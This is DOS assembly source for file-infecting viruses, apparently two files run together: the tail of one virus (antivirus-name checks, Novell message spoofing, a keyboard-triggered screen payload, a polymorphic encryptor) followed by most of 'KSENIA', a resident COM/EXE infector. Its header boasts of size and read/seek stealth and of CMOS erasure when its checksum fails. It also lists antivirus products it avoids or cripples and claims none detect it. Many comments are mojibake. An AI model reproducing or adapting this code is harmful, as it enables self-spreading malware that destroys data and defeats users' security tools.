; get pages/lst page lenght adc dx,0 mov cx,512 div cx or dx,dx jz $+3 inc ax mov word ptr buffer+2,dx mov word ptr buffer+4,ax clc ret exerr: stc ret ; 䠩 । ࠦ + filenamecheck: pusha ; ࠭ ॣ mov si,dx ; si=dx dec si ; dec+inc=0 findend: inc si ; cmp byte ptr [si],0 jne findend findname: dec si ; decrease si cmp byte ptr [si],'\' je gotname cmp byte ptr [si],':' je gotname cmp si,dx jae findname gotname: inc si ; si=filename mov ax,[si] ; get first chars call upreg cmp ax,'IW' ; Windows? je winfound otherfiles: cmp ax,'IF' ; FindVirus? je badfile cmp ax,'CS' ; Scan? je badfile cmp ax,'SV' ; VSafe/VShield? je badfile cmp ax,'BT' ; Fucked TBSCAN? je badfile cmp ax,'RD' ; DRWEB? je badfile cmp ax,'VA' ; AVP? je badfile cmp ax,'-F' ; F-PROT? je badfile cmp ax,'PF' ; FPROT? je badfile cmp ax,'DA' ; ADInf? je badfile cmp ax,'OC' ; COMMAND interpreter? je badfile clc ; filename is okay popa ret badfile: stc ; bad file... popa ret winfound: cmp cs:func_number,4b00h ; windows: EXECUTE? jne otherfiles mov ax,[si+2] ; get second two chars call upreg ; uppercase cmp ax,'.N' ; wiN.? jne otherfiles mov ax,[si+4] ; get third two chars call upreg cmp ax,'OC' ; win.CO? jne otherfiles push ds es ; widows executing: mov si,es:[bx+2] ; offset of command line mov ax,es:[bx+4] ; get segment =es=ds mov ds,ax mov es,ax mov di,si ; ds:si=es:di=comline inc di cld cmp byte ptr [si],0 ; no parameters entered? je writeparam mov al,0dh ; search for the cr(lf) mov cx,127 repne scasb jne noparam ; error? dec di writeparam: mov cx,6 add byte ptr [si],5 ; increase lenght of push cs ; the command line pop ds lea si,wino32bit rep movsb ; write new params... noparam: pop es ds clc ; exit, file is okay! popa ret ; Checks the handle (Disk file?) handlecheck: pusha mov ax,4400h call int21 jc hcerr test dl,80h jnz hcerr clc popa ret hcerr: stc popa ret ; subroutine to decrease number of read bytes and remove lseek from virus zone seekhide: call seek2eof sub ax,vsize sbb dx,0 cmp dx,cs:seek_pos+2 jb hidevirus ja not_us cmp ax,cs:seek_pos jae not_us hidevirus: push ax sub cs:seek_pos,ax mov ax,cs:seek_pos sub cs:nrbytes,ax ; subtract number of read bytes pop ax mov cs:seek_pos,ax mov cs:seek_pos+2,dx not_us: call restoreseek ret ; lseek tools seeksave: pusha xor cx,cx xor dx,dx call seekfrom_cur mov cs:seek_pos,ax mov cs:seek_pos+2,dx popa ret restoreseek: pusha mov dx,cs:seek_pos mov cx,cs:seek_pos+2 call seekfrom_bof popa ret seek2bof: mov ax,4200h xor cx,cx mov dx,cx jmp realseek seek2eof: mov ax,4202h xor cx,cx xor dx,dx jmp realseek seekfrom_eof: mov ax,4202h jmp realseek seekfrom_cur: mov ax,4201h jmp realseek seekfrom_bof: mov ax,4200h realseek: call int21 ret ; Upper case AX upreg: cmp al,61h jb goodchar cmp al,7ah ja goodchar sub al,20h goodchar: cmp ah,61h jb _good_ cmp ah,7ah ja _good_ sub ah,20h _good_: ret ; ; 猪 㩭 Novell Network ; novell: pushall mov ax,7a00h ; Novell installation check int 2fh or al,al jz no_novell mov ax,2ah ; ? (..) call int21 cmp al,1 ; 쭨? jne no_novell mov ah,2ch ; 5 -? call int21 cmp cl,5 jne no_send push cs cs pop ds es cld in al,40h ; 砩 ᫮ and al,111b ; [0..7] mov word ptr buffer,9eh mov byte ptr buffer+2,0 ; ᫠ ᮮ饭 mov byte ptr buffer+3,1 ; 1 connection mov byte ptr buffer+4,al ; connection # mov byte ptr buffer+5,endnmess-nmess ; ᠣ lea si,nmess lea di,buffer+6 mov cx,endnmess-nmess rep movsb mov ah,0e1h ; ࠢ 䠪 lea si,buffer lea si,two_bytes call int21 mov cx,60 lea di,buffer+4 fake_down: mov byte ptr [di],10 inc di loop fake_down mov word ptr buffer,3eh mov byte ptr buffer+2,9 mov byte ptr buffer+3,3ch ; ᮮ饭 lea si,buffer lea di,two_bytes mov ah,0e1h call int21 jmp no_novell no_send: cmp ch,17 jne no_novell mov ah,0d7h call int21 no_novell: popall ret ; ஢ ⥫ 䠩 ; ᠬ ⮬ (⠢ ret () ) writevirus: mov ax,5700h ; ६/ ᫥ call int21 ; ஢ 䠩 push dx cx ; ࠭ ⥪ mov ah,2ch ; ⥪饣 ६ call int21 ; dx:cx pop ax ; ⠭ ax ࠭ ᭮ push ax ; ६ shr ah,3 ; ६ ( 11-15 cx) cmp ah,ch ; ᮢ? ᫨ , 뢠, je write_fail ; ⮡ ᢥ call seek2eof ; 䠩 mov ah,40h ; 뢠 䠩 mov cx,vsize cwd call crypt_int21_crypt ; ᭠砫 㥬 xor cx,ax ; vsize ᠫ? jnz write_fail call seek2bof ; 砫 mov ah,40h ; 뢠 mov cx,28 ; com/exe 䠩 lea dx,buffer call int21 write_fail: pop cx dx ; ६ 䠩 mov ax,5701h ; ⠭ ⭮ call int21 ret MEM_ENC_END: ; ࠡ稪 뢠 int 09h int9: pusha ; ࠭ ᯮ㥬 ॣ push ds cs ; ds=cs pop ds in al,60h ; ᪠- cmp al,80h ; ⨫? jb quit_9 ; : 室 mov si,point ; ⠥ ⥪騩 㪠⥫ cmp [si],al ; ᫥ 㪢 室? jne zero_pointer ; : 㫨 㪠⥫ inc si ; 室. ६஢ 㪠⥫ cmp si,offset keyword+6 ; 6 㪢 뫨 ? jb save_it ; : ࠭ 祭 mov al,0ffh out 21h,al mov ax,3 int 10h push cs pop es lea bp,smb_pattern mov dx,'1' modify_keygen: mov cx,1 mov ax,1100h mov bx,0e00h int 10h add bp,0eh inc dx cmp dx,'6' jne modify_keygen mov ah,1 mov ch,100000b int 10h mov ax,0b800h mov es,ax xor si,si xor di,di mov cx,endcopy-copy Im_here: mov al,cs:copy+si mov ah,0ah mov es:[di],ax inc si inc di inc di loop Im_here jmp $ zero_pointer: lea si,keyword ; 塞 㪠⥫ save_it: mov point,si ; ࠭塞 quit_9: pop ds ; ⠭ 类 쬮 popa jmp dword ptr cs:io9 ireturn: call restorehost ; re-ᯫᨭ pop word ptr cs:buffer ; garbage pop word ptr cs:buffer pop word ptr cs:buffer retf 2 exithandler: push si ds ax ; ࠭ ॣ lds si,dword ptr cs:_addr21 ; mov ah,cs:splint mov al,0cdh xchg ax,[si] mov cs:keepword,ax pop ax ds si mov cs:resthost,1 push bp mov bp,sp sub word ptr [bp+2],2 ; ⪮४஢ pop bp ; iret ; finita la comedia ; (த ⠪) restorehost: push ds si ax ; ࠭ ॣ lds si,dword ptr cs:io21 ; ࠡ稪 mov ah,cs:splint mov al,0cdh mov [si],ax ; 맮 there pop ax si ds ; ⠭ ॣ ret db 4 dup (?) ; ணࠬ /ࠧ-஢ ; ᯮ XOR/ADD/SUB/NOT/INC/DEC/ROR/ROL/NEG ஢騪 ; 砩 crypt: pushf ; ࠭ ᯮ㥬 ॣ pusha push ds foolsr: ; ᥬ mov ax,01ebh ; ४뢠騩 mov bx,02ebh nop mov cx,3ebh nop nop mov dx,4ebh nop nop nop mov ax,2ebh jmp foolsr+1 call extra ; ᫨ -ᬥ饭 push 0 ; ⨪ pop ds mov si,21h*4 ; terminate, ⨤ push dword ptr [si] lea ax,fool_antiv+bp push cs ax pop dword ptr [si] mov ah,0b4h int 21h cc?: cmp dx,0fa01h je $+30h fool_antiv: pop ax bx dx pop dword ptr [si] cmp byte ptr cs:cc?+bp,0cch jne bug int 19h bug: db 0b0h ; ஢뢠 pre_ki db 000h ; 堭 lea si,crmain+bp mov cx,endcr-crmain de_cr: xor cs:[si],al ; ஬ inc si loop de_cr crmain: ; 堭 jmp overtable algorithm dw 9090h ; crtable label word ; ⠡ ஢騪 xor dl,cl add dl,cl sub dl,cl not dl inc dl dec dl ror dl,cl rol dl,cl neg dl decrtable label word ; ⠡ ஢騪 xor dl,cl sub dl,cl add dl,cl not dl dec dl inc dl rol dl,cl ror dl,cl neg dl overtable: db 0ebh,decrypt-overtable-2 in al,40h ; 砩 ᫮ sub al,9 jnc $-2 add al,9 cbw add ax,ax mov si,ax mov ax,cs:[crtable+si+bp] ; ஢騪 mov cs:[algorithm+bp],ax in al,40h mov cs:[value+bp],al mov bx,si decrypt: mov ax,cs:algorithm+bp mov si,208h push dword ptr [si] mov word ptr [si],ax mov byte ptr [si+2],0cbh xor byte ptr cs:overtable+bp+1,decrypt-overtable-2 lea si,enc_start+bp ; 樠 mov cx,crypt-enc_start db 0b0h value db ? decrvirus: mov dl,byte ptr cs:[si] ; -!!! xor al,cl xchg al,cl db 09ah dw 208h,0 xchg al,cl mov byte ptr cs:[si],dl inc si loop decrvirus pop dword ptr ds:[208h] endcr: mov si,bx mov ax,word ptr cs:[decrtable+bp+si] mov cs:[algorithm+bp],ax lea si,crmain+bp ; encrypt main engine mov cx,endcr-crmain in al,40h mov cs:pre_ki+bp,al c2: xor cs:[si],al inc si loop c2 pop ds popa popf cr_ret: ret ;_________--------------________ strategy: push bp call extra mov cs:[req_head+bp],bx mov cs:[req_head+bp+2],es pop bp db 68h old_strategy dw ? ret win_trick: nop nop db 0eah win21 dw ?,? int24h: db 0c0h,0e0h,10h ; shl ( shr) al,10h => zero stc rcl al,3 ; 稬 al = 4 dec al iret ; !!! crypt_int21_crypt: call crypt push offset crypt int21: pushf ; 맮 21- db 0ebh,3 ; ਬ ४뢠騩 mov ax,04ebh jmp $-2 dw 0ffffh db 09ah ; call far ptr .. io21 dw ?,? ret extra: ; 塞 ⥫쭮 ᬥ饭 pushf push eax db 66h,0b8h int 1ch subextr: jmp $+4 jmp $-4 mov bp,sp ; 設 ⥪ mov bp,word ptr [bp-6] sub bp,offset subextr pop eax popf ret eov: io1 dw ?,? ; 㡥 ஢ io9 dw ?,? io1c dw ?,? io24 dw ?,? req_head dw ?,? point dw ? ; ࠡ稪 int 09h resthost db ? _addr21 dw ?,? splint db ? keepword dw ? prev2 dw ? ; 砫 21- ࠡ稪 stf db ? ; 䫠 饣 ⥫ drf db ? ; 䫠 fcb ⥫ seek_pos dw ?,? ; ࠭ seek nrbytes dw ? ; ⮦ ⠭ func_number dw ? func_jump dw ? two_bytes dw ? sys_sp dw ? sys_ss dw ? psp dw ? buffer db vsize dup (?) eom: end ksenia [KSENIA.ASM] [KSENIA.ASM] comment KSENIA Virus Version 1.0 Copyright (C) Deadman TSR/COM/EXE fast polymorphic infector Infects on 1857h/3Dh/41h/43h/4Bh/56h/6Ch/7141h/7143h/7156h/716Ch/71A9h (Internal/Open/Del/Chmod/Exec/Ren/ExtOpen/LFNs/LFN Server Open) Size/Date stealth on 11h/12h/4Eh/4Fh/5700h/5701h/714Eh/714Fh/71A6h (Find First/Next FCB/DTA/LFN + Get/Set File Time/Date + Get Handle Info) Redirection stealth on 3Fh/42h (Read/LSeek) SFT stealth without using any SFT values (for Novell/Win95 compatibility) Disinfects the host on 40h (Write) Re-Hooks Int 21h vector after Win95 installation. Works perfectly! Re-Hooks Int 21h vector if virus handler has been removed from the chain Every second it calcucates CRC32 and erases CMOS if the CRC is incorrect Virus stays resident in low memory, executing the host with 4B00h function When some of AVs are executing, virus adds some parameters to cmdline Polymorphic in files uses its internal polymorphic engine Engine uses table-based instructions as a random size garbage (85% of 8086) Engine uses different count and index registers Generates different decryptors (ADD/SUB/XOR/NOT/NEG/ROR/ROL/INC/DEC imm8) Has a second internal shield (secondary encrypts itself with a kewl method) Will not infect files with a current hour stamp Filenames with digits will not be infected Will not infect AVP/DrWeb/Web/F-Prot/TB/ADInf/Clean/Scan/NOD/VSafe/Anti/NAV/FV/FindViru/Command Disable stealth if PkZip/RAR/ARJ/LHA/ARC/DEFRAG/SPEEDISK/CHKDSK/BACKUP/MSBACKUP/ScanDisk/NDD are running Intercepts Int 24h to disallow user be warned by a critial error message Virus was analysed by these AVs AVP 3.0.130 - No detection or warns DRWEB 4.11 - No detection or warns F-PROT 3.05 - No detection or warns Deadman from hell. E-Mail: dman@mail.ru vsize equ eov-ksenia ; ᪮ msize equ eom-ksenia ; ࠧ ॡ㥬 crlen equ 256 ; ࠧ ஢騪 B equ ; ᮪饭 W equ D equ mvs macro Seg1,Seg2 ; push Seg2 ; mvs es,cs -> push cs/pop es pop Seg1 endm model tiny ; codeseg p386 org 100h ksenia: xor bp,bp ; 㦭 1- ᪠ call crc ; CRC cmp checksum,eax ; ࠢ CRC32 je shield ; CRLEN १ࢨ஢ ⥫ lea di,r_crc mov cx,4 trans: rol eax,8 push ax call hex2a stosw pop ax loop trans mov ah,9 ; 䭮 ஢騪 lea dx,badcrc int 21h mov ax,4c02h int 21h hex2a: aam 10h add ax,3030h cmp al,':' jb $+4 add al,7 xchg al,ah cmp al,':' jb $+4 add al,7 ret badcrc db 'Virus code has been modified. The correct CRC is ' r_crc db '00000000h',0dh,0ah,24h org ksenia+CRLEN cld mov ah,30h ; ᨨ , ⮫쪮 int 21h ; . ᠬ ६ ⥪ ip: mov bp,sp mov bp,[bp-6] ; ࠭ IP INT sub bp,offset ip ; 塞 ࠧ ᬥ饭 (delta) push ds 0ffffh ; ⠪ web' pop ds mov al,ds:[7] ; ⠥ ROM pop ds ; 筮 ⮬ ࠭ xor al,2fh ; ⠥ slash ⮩ cbw ; AX=00 inc ax ; AX=01 mov dx,ax ; DX=01 lea si,original-1+bp ; ஥ (७) mov cx,original-shield-1 turbo: mov al,cs:[si] ; ⪠ : add cs:[si-1],al ; : byte1 byte2 byte3 byte4 sub si,dx ; : b1+b2 b2+b3 b3+b4 b4+b5 loop turbo shield: mov ax,1856h ; ஢ઠ ⢨ int 21h ; AH=18 - 㭪 cmp ax,3265h ; AX=3265 - , 㦥 jne install ; lea si,original+bp ; si-࠭ 砫 mov ax,cs:[si] cmp ax,'MZ' ; 㤠 ⨫ ? je run_exe ; ᫨ 稭 'MZ' 'ZM' cmp ax,'ZM' ; -> EXE je run_exe ; mov di,0100h ; ⮢ mov cx,32 rep movsb ; ⠭ mov si,100h ; 砫 ࠦ 䠩 mov dx,cs jmp restp run_exe: mov ax,es add ax,010h add cs:[si+16h],ax ; ஥ CS add ax,cs:[si+0eh] ; ஥ SS mov dx,cs:[si+10h] ; ஥ SP mov ss,ax mov sp,dx mov dx,cs:[si+16h] ; CS mov si,cs:[si+14h] ; IP restp: push dx si xor ax,ax ; ⠭ ॣ xor bx,bx mov cx,0ffh mov dx,ds mov di,sp add di,4 mov bp,912h retf ; ⤠ ࠢ ணࠬ ; ⠫ install: mov di,100h ; ES:DI = PSP:0100 mvs ds,cs ; DS:SI = lea si,ksenia+bp ; 㥬 ࠦ mov cx,msize ; ணࠬ ࠧ ᫥ PSP db 6ah,00h ; 㦠 ⥪ db 66h,68h ; ஢ db 0f3h,0a4h,0cah,6 push es offset done ; rep movsb / retn 6 mov ax,sp add ax,4 cld jmp far ptr ax done: mov ax,cs ; , ࠢ mov ds,ax ; ᬥ饭, 樨 mov seg0,ax ; ᥣ EPB mov seg1,ax mov seg2,ax call WinOldAp ; 祭 ⠫樨 WinOldAp mov w95state,ax ; ࠭ 䫠 mov ax,3521h ; AH=35 AL=INT# - 㭪 祭 int 21h ; 뢠 AL mov io21p,bx ; ࠭ 祩 mov io21p+2,es call set_dup ; ⠭ 21- 뢠 㣮 mov ax,2521h ; ⠭ ᢮ ࠡ稪 lea dx,handler ; 뢠 int 21h mov ax,3508h ; 뢠 int 21h mov io08,bx ; ࠭ 祩 mov io08+2,es mov ax,2508h ; ⠭ 뢠 08h (⠩) lea dx,vguard ; ஢ન 楫⭮ int 21h call FixVirus ; ࠦ 䠩 mov ah,4ah ; 㬥 㦭 ࠧ mov bx,(msize+100h)/16+2 ; , 뤥 ணࠬ mvs es,cs int 21h mov si,2ch ; PSP:2Ch = ᥣ 㦥 mov ds,[si] ; DS xor ax,ax mov si,-1 escan: inc si ; ᪠ DW 0 cmp W [si],ax ; ᫥ 䠩 (ணࠬ), jne escan ; ன 襭 lea dx,[si+4] ; dx -> mov ax,cs ; ந樠㥬 ⥪ 㪠⥫ mov ss,ax ; - // lea sp,stacks+size stacks mov ax,4b00h ; ᪠ ⥫ lea bx,epb ; ES:BX = EPB int 21h mov si,2ch mov es,cs:[si] ; 祭 ᥣ 㦥 mov ah,49h ; ᢮ int 21h mov ax,cs ; ᪨㥬 ⠪, dec ax ; ᮤন ⮫쪮 PSP. ᥡ mov ds,ax ; ந 㣮 , ᫥騩 xor si,si ; אַ PSP. 襭 ணࠬ mov al,4dh ; 㤥 ᢮. xchg B [si],al mov W [si+3],0fh ; MCB  ।⠢ mov B [si+100h],al ; ப (PSP+0F0h) mov W [si+101h],8 ; mov W [si+103h],msize/16+2 mov ah,4dh ; AH=4Dh (WAIT) int 21h ; ErrorLevel 饭 ணࠬ mov ah,4ch ; AH=4Ch (EXIT) int 21h ; DOS 直 ७ ; copyright db 'Ksenia.' db vsize/1000 mod 10+'0' db vsize/100 mod 10+'0' db vsize/10 mod 10+'0' db vsize mod 10+'0' db ' Version 1.0 Copyright (C) by Deadman',0 v_id db '[KSENIA/Deadman]',0 ssize equ $-v_id extens db '.com',0 ; ७ 䠩, db '.exe',0 ; 㥬 db 0 prms db 'DRWEB' ,0,0,' /NM' ,0dh db 'F-PROT',0,0,' /NOMEM',0dh db 'AVP' ,0,0,' /M' ,0dh db 0 AVs db 'AVP',0 ; ண 㤥 db 'DrWeb',0 db 'Web',0 db 'F-Prot',0 db 'TB',0 db 'ADInf',0 db 'Clean',0 db 'Scan',0 db 'NOD',0 db 'VSafe',0 db 'Anti',0 db 'NAV',0 db 'FV',0 db 'FindViru',0 db 'Command',0 db 0 windir db 'WINBOOTDIR=',0,0 comspec db 'COMMAND',0,0 fixes db '\SYSTEM\CONAGENT.EXE',0 db '\COMMAND\MODE.COM',0 db 0 stlock db 'PkZip',0 ; ணࠬ, ६ ࠡ db 'RAR',0 ; ⪫ ⥫-㭪樨 db 'ARJ',0 db 'LHA',0 db 'ARC',0 db 'ZOO',0 db 'DEFRAG',0 db 'SPEEDISK',0 db 'ChkDsk',0 db 'BACKUP',0 db 'MSBACKUP',0 db 'ScanDisk',0 db 'NDD',0 db 0 funcs dw 1856h,tsrtest ; ஢ઠ ࠦ (NULL) dw 4AFFh,rehook ; re-墠 (SETBLOCK) dw 3DFFh,infect ; ࠦ (OPEN) dw 1857h,infect ; ࠦ (VIXFIRUS) dw 41FFh,infect ; ࠦ (DEL) dw 43FFh,infect ; ࠦ (CHMOD) dw 4BFFh,infect ; ࠦ (EXEC) dw 56FFh,infect ; ࠦ (REN) dw 6C00h,extinfect ; ࠦ (EXTOPEN) dw 7141h,lfninfect ; ࠦ (LFN DEL) dw 7143h,lfninfect ; ࠦ (LFN CHMOD) dw 7156h,lfninfect ; ࠦ (LFN REN) dw 716Ch,extlfninf ; ࠦ (LFN OPEN) dw 71A9h,extlfninf ; ࠦ (LFN SERVER OPEN) dw 11FFh,fcbstealth ; ⥫ (FCB) dw 12FFh,fcbstealth ; ⥫ (FCB) dw 4EFFh,dtastealth ; ⥫ (DTA) dw 4FFFh,dtastealth ; ⥫ (DTA) dw 714Eh,lfnstealth ; ⥫ (LFN) dw 714Fh,lfnstealth ; ⥫ (LFN) dw 71A6h,infstealth ; ⥫ (LFN HANDLE INFO) dw 5700h,date_get ; ⥫ (GET DATE) dw 5701h,date_set ; ⥫ (SET DATE) dw 42FFh,seekstealth ; ⥫ (LSEEK) dw 3FFFh,readstealth ; ⥫ (READ) dw 40FFh,diswrite ; ⥫ (WRITE) dw 3EFFh,patchsft ; ४஢ SFT dw 44FFh,patchsft ; ४஢ SFT dw 45FFh,patchsft ; ४஢ SFT dw 46FFh,patchsft ; ४஢ SFT dw 68FFh,patchsft ; ४஢ SFT dw 0 ; ࠡ稪 뢠 08 (Virus Guard) vguard: call SaveRegs ; ࠭ ॣ஢ inc cs:delay ; ஢ઠ 㤥 ந室 ਬ୮ cmp cs:delay,18 ; ᥪ㭤 jb exit_guard mov cs:delay,0 call crc ; CRC ⥫ cmp cs:checksum,eax ; ࠢ ⠫ jz crc_ok mov al,0ffh ; 饭 뢠 out 21h,al mov cx,40h ; ࠥ CMOS cmos: mov ax,cx out 71h,al jmp $+2 out 70h,al loop cmos jmp $ crc_ok: mov ax,1856h ; ஢塞, 모뢠 int 21h ; ࠡ稪 21- 뢠 饩 cmp ax,3265h ; 楯? je exit_guard mov ax,3521h ; int 21h int 21h call set_dup ; ⠭ 21- 뢠 㣮 lea dx,manager ; 㦭 ⠭ call chk_dup ; 室 , 㤠 㪠뢠 jnz reset ; ᫥ ᢮ lea dx,handler reset: mov ax,2521h ; ⠭ mvs ds,cs int 21h exit_guard: call LoadRegs jmp d cs:io08 ; ࠡ稪 뢠 21 handler: call chk_dup ; ஢ઠ, ⠭ jz manager ; 뢠 ᫥ 㧪 Win95 jmp D cs:io21p ; 祬 manager: call SaveRegs ; ࠭ ॣ mov cs:save_ax,ax ; ᮮ࠭ ࠬ஢ mov cs:save_bx,bx ; ᯮ짮 (Filename), ᫨ mov cs:save_es,es ; 㭪 = 4b00 ᪠ 䠩 - AV lea si,funcs ; ⠡窠, ன ࠡ뢠 fscan: cmp ah,cs:[si+1] ; 㦭 㭪樨 int 21 (db F#, dw offset) jne lnext ; ࠢ al ⥪饩 祩 ⠡ cmp B cs:[si],0ffh ; ஢ઠ 㦭 ஢ન 㭪樨 je ljump cmp B cs:[si],al ; ஢ઠ 㭪樨 jne lnext ljump: call mcbcheck ; 㭪 : ஢ઠ MCB ( stealth) push W cs:[si+2] ; ६ ᬥ饭 ࠡ稪 㭪樨 jmp LoadRegs ; ⠭ ॣ lnext: add si,4 ; ६ ᫥ ⠡ cmp w cs:[si],0 ; ஢ઠ ⠡ jnz fscan call LoadRegs ; ࠡ稪 ⮩ 㭪樨 ⠪ jmp ExitHandler ; : ⤠ ࠢ exithandler: push ax ax es bx bp ; ࠭ ES:BX १ࢨ஢ call get_dup ; 祭 ਣ쭮 int 21h mov bp,sp mov [bp+6],bx ; ᢮ 祩 mov [bp+8],es ; ⥪ pop bp bx es ; ⠭ ॣ஢ ES:BX retf ; । ࠢ DOS ireturn: retf 2 ; 㭨⮦ 䫠 ⥪ ; ࠦ 䠩 extlfninf: call SaveRegs ; ࠭ ⥪ ॣ mov dx,si jmp lfnbreak lfninfect: call SaveRegs ; ࠭ ⥪ ॣ lfnbreak: call Hook24 ; ⠭ 24- 뢠 call Filename ; ஢ઠ ७ 䠩 jc noinf call LFNClrAttrib ; ⪠ ਡ⮢ 䠩 jc noinf call LFNOpenFile ; ⨥ 䠩 R/W jc LFNga call Infect_Handle ; ஢ handle call CloseFile ; ⨥ 䠩 LFNga: call LFNRestAttrib ; ⠭ ਡ⮢ 䠩 jmp noinf extinfect: call SaveRegs ; ࠭ ⥪ ॣ mov dx,si jmp break infect: call SaveRegs ; ࠭ ⥪ ॣ break: call Hook24 ; ⠭ 24- 뢠 call Filename ; ஢ઠ ७ 䠩 jc noinf call ClrAttrib ; ⪠ ਡ⮢ 䠩 jc noinf call OpenFile ; ⨥ 䠩 R/W jc RAttr call Infect_Handle ; ஢ handle call CloseFile ; ⨥ 䠩 Rattr: call RestAttrib ; ⠭ ਡ⮢ 䠩 Noinf: call Remove24 ; ⠭ ࠡ稪 int 24h call LoadRegs ; ⠭ ॣ஢ cmp ah,3dh je sftstealth cmp ax,6c00h je sftstealth jmp exithandler ; SFT stealth sftstealth: call int21 ; 㦭 䠩 call SaveRegs ; ࠭ ॣ஢ jc no_sft xchg ax,bx call CloseSFT ; SFT no_sft: call LoadRegs jmp ireturn ; FCB stealth fcbstealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ cmp al,0ffh ; -? jz no_fcb cmp cs:stf,0 ; ࠡ ? jnz no_fcb cmp cs:command,0 ; command.com'? jnz no_fcb mov ah,2fh ; DTA call int21 cmp B es:[bx],0ffh ; ७ FCB? jne usual add bx,7 usual: lea si,[bx+14h] ; si -> 䠩 lea di,[bx+1Dh] ; di -> 䠩 call sizst ; ⨥ 譨 no_fcb: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; DTA stealth dtastealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_dta ; 諨? cmp cs:stf,0 ; ࠡ ? jnz no_dta mov ah,2fh ; DTA call int21 lea si,[bx+18h] ; si -> 䠩 lea di,[bx+1ah] ; di -> 䠩 call sizst ; ⨥ 譨 no_dta: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; Win95 stealth infstealth: stc ; CF ⠭ call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_win ; ok? cmp cs:stf,0 ; ࠡ ? jnz no_win mov ax,0 ; ६ Win95 ଠ mov si,dx lea di,[si+24h] ; ࠧ 䠩 lea si,[si+14h] ; 䠩 mvs es,ds jmp allw95 lfnstealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_win ; 諨? cmp cs:stf,0 ; ࠡ ? jnz no_win mov ax,si ; ଠ ६ lea si,[di+14h] ; 䠩 lea di,[di+20h] ; ࠧ 䠩 allw95: cmp ax,1 ; ஢ઠ ଠ ६ jz dos_date push si di ax ; ࠭ ࠬ஢ 饥 mov ax,71a7h ; ॢ ६ ଠ mov bl,0 ; Win95 ଠ DOS mvs ds,es ; SI 㪠뢠 call int21 ; ᥩ CX:DX ᮤঠ 筮 DOS ६ pop ax di si ; ⠭ ࠬ஢ mov [si],cx ; ࠭ ࠬ஢ FindDataRecord mov [si+2],dx dos_date: add si,2 ; si -> 䠩 call sizst ; di -> 䠩 sub si,2 cmp ax,1 ; ஢ઠ ଠ ६ jz no_win mov ax,71a7h ; ॢ ६ ଠ mov bl,1 ; DOS ଠ Win95 mov di,si ; DI -> buffer ६ mov cx,[di] ; ⥭ ६ ଠ DOS mov dx,[di+2] call int21 ; ᥩ ES:[DI] ᮤন ६ Win95 no_win: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; DATE stealth date_get: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call int21 ; call hidestm ; ᪨஢ clc jmp seek_ret date_set: call OpenSFT ; SFT call int21 ; ⠭ call correctdate ; ࠢ jmp seek_ret ; LSEEK stealth seekstealth: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call HandleCheck ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek push cx ; ࠭ CX cmp al,2 ; ஢ઠ ⨯ jne forw sub dx,vsize ; ᪨஢ 饣 䠩 sbb cx,0 ; ᤢ forw: call int21 ; ⠭ 㪠⥫ 砫 pop cx ; ⠭ CX jc seek_ret ; ⥪饩 樨 call seekhide ; ஢ lseek ⥫ mov ax,cs:seek_pos mov dx,cs:seek_pos+2 jmp seek_ret no_seek: call int21 ; 맮 DOS seek_ret: call CloseSFT ; SFT jmp ireturn ; READ stealth readstealth: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call HandleCheck ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek call SeekSave ; ࠭ 樨 㪠⥫ call int21 ; ⥭ jc seek_ret call SaveRegs ; ࠭ ॣ஢ mov di,dx ; 㡫஢ ᬥ饭 mov cs:nrbytes,ax ; ⢮ ⠭ cmp D cs:seek_pos,32 ; ? jae zone call crload ; 饥 砫 䠩 lea si,buffer ; SI -> 饥 砫 add si,cs:seek_pos ; SI -> ⥬ ᬥ饭 ⥭ mov cx,cs:nrbytes ; ⠥ ⢮ 㦭 add cx,cs:seek_pos ; ⥫ cmp cx,32 ; ⥭ । jbe $+5 ; ࠭ 砫 䠩? mov cx,32 sub cx,cs:seek_pos jcxz zone ; 砥 ⥭ 0 rhide: mov al,cs:[si] ; ஢ 砫 䠩 mov [di],al ; ਣ쭮 inc si inc di loop rhide zone: call seekhide ; 㥬 lseek call LoadRegs ; + 㬥襭 ᫠ ⠭ mov ax,cs:nrbytes ; jmp seek_ret ; ALL HANDLER stealth patchsft: call OpenSFT ; SFT jmp no_seek ; WRITE stealth diswrite: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call HandleCheck ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek call SaveRegs ; ࠭ ॣ஢ call SeekSave ; ࠭ 樨 㪠⥫ mvs ds,cs ; DS=CS call crload ; 㧪 ਣ쭮 砫 call seek2bof ; 㪠⥫ 砫 䠩 mov cx,32 ; ਣ쭮 䠩 lea dx,buffer call write xor cx,ax ; 訡? ⮣ ⮣, jnz disfail ; 祣 訡 㤥 ⮦! mov cx,-1 ; . .. mov dx,-vsize ; ࠦ ணࠬ call seekfrom_eof mov ah,40h ; १ 䠩 xor cx,cx ; 㤠塞 ⥫ ᮭ⥫ call int21 mov ah,68h ; 뢠 call int21 disfail: call RestoreSeek ; ⠭ 樨 㪠⥫ call LoadRegs ; ⠭ ॣ஢ jmp no_seek ; 室 ; ஢ઠ ஢ tsrtest: mov ax,3265h ; Hi, AX=3265 jmp ireturn ; 墠 int 21h rehook: call SaveRegs ; ࠭ ॣ஢ call chk_dup ; ஢ઠ, 㦥 jnz no_hook ; ⠭ call WinOldAp ; ஢ઠ, - cmp ax,cs:w95state ; ⠫樨 jz no_hook ; (뫠 㦥 Win95) mov ax,3521h ; 祭 int 21h int 21h mov ax,2521h ; ⠭ 뢠 lea dx,manager mvs ds,cs int 21h call set_dup ; ࠭ 㣮 祩 IVT no_hook: call LoadRegs ; ⠭ ॣ஢ jmp exithandler ; > SUBROUTINES < ; ࠦ 䠩 ; ᯮ STACKS ⢥ 䠩 FixVirus: call SaveRegs ; ࠭ ॣ஢ mov si,2ch mov ds,cs:[si] ; 㧪 